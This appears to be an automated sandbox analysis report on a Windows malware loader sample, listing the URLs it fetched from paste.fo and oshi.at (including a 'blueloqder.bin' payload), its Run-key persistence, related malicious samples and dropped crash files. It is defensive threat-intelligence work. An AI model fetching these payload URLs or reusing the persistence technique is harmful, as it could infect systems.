https://paste.fo0%Avira URL Cloudsafe
http://oshi.atd0%Avira URL Cloudsafe
http://paste.fod0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
oshi.at
5.253.86.15
truefalse
    		unknown
    paste.fo
    		104.21.70.240
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://paste.fo/raw/015dbe46ef97false
      • Avira URL Cloud: safe
      		unknown
      https://oshi.at/tqJAc/blueloqder.binfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://oshi.atd9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://oshi.at9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: malware
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://crl.microsoftpowershell.exe, 00000013.00000002.1439367542.00000000070E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://paste.fo9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/somenonymous/OshiUpload9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002806000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://paste.fod9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://oshi.at9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://paste.fo9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://upx.sf.netAmcache.hve.7.drfalse
                      		high
                      https://paste.fo/raw/015dbe46ef97T9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002799000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C19000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.70.240
                          		paste.foUnited States
                          		13335CLOUDFLARENETUSfalse
                          5.253.86.15
                          		oshi.atCyprus
                          		208046HOSTSLICK-GERMANYNLfalse

                          General Information

                          Joe Sandbox version:38.0.0 Ammolite
                          Analysis ID:1356250
                          Start date and time:2023-12-08 14:35:00 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:37
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:9K25QyJ4hA.exe
                          renamed because original name is a hash value
                          Original Sample Name:b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
                          Detection:MAL
                          Classification:mal72.evad.winEXE@15/26@2/2
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 147
                          • Number of non-executed functions: 8
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.189.173.21, 52.168.117.173
                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 6780 because it is empty
                          • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7544 because it is empty
                          • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7964 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: 9K25QyJ4hA.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:35:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
                          14:36:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.70.240https://hp49wqdw7g43qv1i4n88.nh6hd1s.ru/8tnf/Get hashmaliciousUnknownBrowse
                            5.253.86.15PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                              PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                VGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                  wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                    KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                      BHHh.exeGet hashmaliciousUnknownBrowse
                                        SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                                          PO_756380.jsGet hashmaliciousUnknownBrowse
                                            PO_756380.jsGet hashmaliciousUnknownBrowse
                                              nxIBGfk1rr.exeGet hashmaliciousRedLineBrowse
                                                lvm.exe.exeGet hashmaliciousCobaltStrikeBrowse
                                                  KJkj2S7Clo.exeGet hashmaliciousSmokeLoaderBrowse
                                                    Draft_Document.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousRedLineBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        oshi.atPAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        VGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                        • 5.253.86.15
                                                        wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                                        • 5.253.86.15
                                                        KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                                        • 5.253.86.15
                                                        BHHh.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        PO_756380.jsGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        PO_756380.jsGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        nxIBGfk1rr.exeGet hashmaliciousRedLineBrowse
                                                        • 5.253.86.15
                                                        lvm.exe.exeGet hashmaliciousCobaltStrikeBrowse
                                                        • 5.253.86.15
                                                        KJkj2S7Clo.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 5.253.86.15
                                                        Draft_Document.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 5.253.86.15
                                                        rr.exeGet hashmaliciousRedLineBrowse
                                                        • 51.68.141.111
                                                        HuJLbnfEq3.exeGet hashmaliciousNymaim, RedLineBrowse
                                                        • 51.68.141.111
                                                        b82af5f52e227885b6c58f785785481372a9432e415f4.exeGet hashmaliciousRedLineBrowse
                                                        • 51.68.141.111
                                                        5ASHKzytkq.exeGet hashmaliciousRedLine, VidarBrowse
                                                        • 51.68.141.111
                                                        Vde6wWF1N3.exeGet hashmaliciousRedLineBrowse
                                                        • 51.68.141.111

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        HOSTSLICK-GERMANYNLCOTA#U00c7#U00c3O MAGNA LTDA MFOC231877756745758450045Hemihedrism.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.142.59.81
                                                        IMG_WAA00020237535050030500000324Ridderlfte.exeGet hashmaliciousGuLoaderBrowse
                                                        • 193.142.59.81
                                                        rCOTA____OMAGNA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.142.59.81
                                                        IMG-WAA023-202311027935732345535325453Generalisables.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.142.59.81
                                                        rCOTA____OMAGNALTDAMFOC231877756745758450045.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.142.59.81
                                                        rIMG-WAA0211202.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.142.59.81
                                                        SecuriteInfo.com.Win32.RATX-gen.21306.22425.exeGet hashmaliciousRemcosBrowse
                                                        • 193.142.59.240
                                                        PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                                        • 5.253.86.15
                                                        Yegdeajzb.exeGet hashmaliciousRemcosBrowse
                                                        • 193.142.59.240
                                                        PRICE_CHART_AND_MORE_DETAILS.exeGet hashmaliciousRemcosBrowse
                                                        • 193.142.59.6
                                                        ZH-SA_5012023.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 193.142.59.6
                                                        file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                                        • 193.142.59.12
                                                        file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                                        • 193.142.59.12
                                                        8t7XJHwvkR.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                        • 193.142.59.12
                                                        file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                                        • 193.142.59.12
                                                        file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                        • 193.142.59.12
                                                        file.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoaderBrowse
                                                        • 193.142.59.12
                                                        file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                        • 193.142.59.12
                                                        CLOUDFLARENETUS68pT93HY5R.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.84.67
                                                        https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.80.18
                                                        svo0k2D8I1.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.90.183
                                                        https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.80.18
                                                        Payment_45832.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.18.7.145
                                                        https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ebb0j5QjXU-qQZYFfJozDJWY2o9D5BtLjngmk2mcQBRUQjVGQ1czU1BKSEZESVo0VENZT0UxR1dQQy4u&vt=8ff4b611-2394-4f5d-aa41-96057c9a330c_898deb5f-42fb-4f38-8d3d-fdd88a6aeed6_638376144220000000_EUR_Hash_MiEjQryDmSP0Q5%2bsfWmmkF1mqEGpCWipqllkfFFe3vg%3d&lang=en-usGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.2.184
                                                        xyoRhY7Rkm.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.137.232
                                                        Order_NO.Z21239.jsGet hashmaliciousRemcosBrowse
                                                        • 172.67.215.45
                                                        K25Eh2b6Mb.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.13.73
                                                        n5PW3tuGlp.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.169.151
                                                        file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                        • 172.67.135.47
                                                        https://i.nupem.ufrj.br/Jakro_7DJSDGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.80.104
                                                        SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                        • 162.159.135.233
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.31.179
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.31.179
                                                        Google_Gemini_AI_Ultra_v1.msiGet hashmaliciousUnknownBrowse
                                                        • 172.64.41.3
                                                        file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                        • 172.67.196.133
                                                        http://arsyology.xyz/gYefq09Get hashmaliciousUnknownBrowse
                                                        • 104.26.9.44
                                                        https://t.co/XbiWikRFDeGet hashmaliciousPhisherBrowse
                                                        • 104.21.80.104

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0ejKkDc50MRn.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        68pT93HY5R.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        4dRsm2HlTx.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        rJASBillOfLading-TPE36494384_PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        KujreNfyEy.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        q9JMM7QERu.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        TBSRZVcVcm.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        xyoRhY7Rkm.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        oPQOKqascb.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        lXUdtmFlwL.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        Order_NO.Z21239.jsGet hashmaliciousRemcosBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        http://arsyology.xyz/gYefq09Get hashmaliciousUnknownBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        6966406086.vbsGet hashmaliciousXWormBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        https://79968e9b.6ad65e5283e89d8125e9a66c.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        afro76tyg.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15
                                                        tmpBA1E.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.70.240
                                                        • 5.253.86.15

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_4fbfa88f-5217-42b4-8931-8035d206ae7d\Report.wer

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1841070509808507
                                                        Encrypted:false
                                                        SSDEEP:192:JT+kGDdOf0BU/KayHFA/fkzuiF2Z24IO86:t8DdlBU/KaQq3kzuiF2Y4IO86
                                                        MD5:9B59C50D2CA0A20D8A3ED83E23A2B628
                                                        SHA1:ECFE164455E7D63AE2ABB3EF3E2437A80D602962
                                                        SHA-256:0A4F293F8CA653C21FAC6CFE98B43FD5CC7436B44BBD77DE1ACD9F974955ADD6
                                                        SHA-512:BF5DF35C7F0B9C5D840840474B9DFF54FC701704B01D214A80EB010316ABEE73BA9C6A2FB5D05CDD46E661F19DA1FC14F792A3ACEE785F09B7A2AAF2311B0B3B
                                                        Malicious:false
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.6.1.6.4.3.7.6.0.3.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.6.1.6.5.2.8.2.2.7.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.b.f.a.8.8.f.-.5.2.1.7.-.4.2.b.4.-.8.9.3.1.-.8.0.3.5.d.2.0.6.a.e.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.4.f.2.c.3.f.-.3.3.b.e.-.4.e.4.3.-.8.4.d.6.-.5.d.9.b.3.1.f.7.0.e.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.8.-.0.0.0.1.-.0.0.1.4.-.4.4.c.9.-.7.8.7.b.d.b.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_ab1e0c96-a20a-4628-bb81-8174babad1df\Report.wer

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1902060499074274
                                                        Encrypted:false
                                                        SSDEEP:192:PO6kGDMOf0BU/Ka+nyENNtzuiF2Z24IO86:WgDMlBU/KaVENtzuiF2Y4IO86
                                                        MD5:0AB589C5F261901FD6FE97F00C8ABD64
                                                        SHA1:EEE74D15BA143617C6956DC897939C21C7F80AAA
                                                        SHA-256:27568082FD0BACBA24C30645FA9A547480A209ADD97C0C984124A730D3B04DFF
                                                        SHA-512:47819EB74DFC836200804BD0C2301D5D5C479EEA7ABECBD8D927B049F05ABE729F96E774E4DCCFB88CFFD1B154A41B94264833587ECCA757C0F2DE8054F5B221
                                                        Malicious:false
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.6.1.5.5.1.3.7.4.6.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.6.1.5.6.0.1.2.4.7.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.1.e.0.c.9.6.-.a.2.0.a.-.4.6.2.8.-.b.b.8.1.-.8.1.7.4.b.a.b.a.d.1.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.d.c.a.0.6.f.-.7.e.6.7.-.4.1.5.2.-.a.7.e.9.-.f.5.8.7.7.7.f.a.7.d.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.b.d.e.d.-.a.6.7.5.d.b.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_be63dad4-6a05-4436-981b-8a86146a5489\Report.wer

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1840645100877396
                                                        Encrypted:false
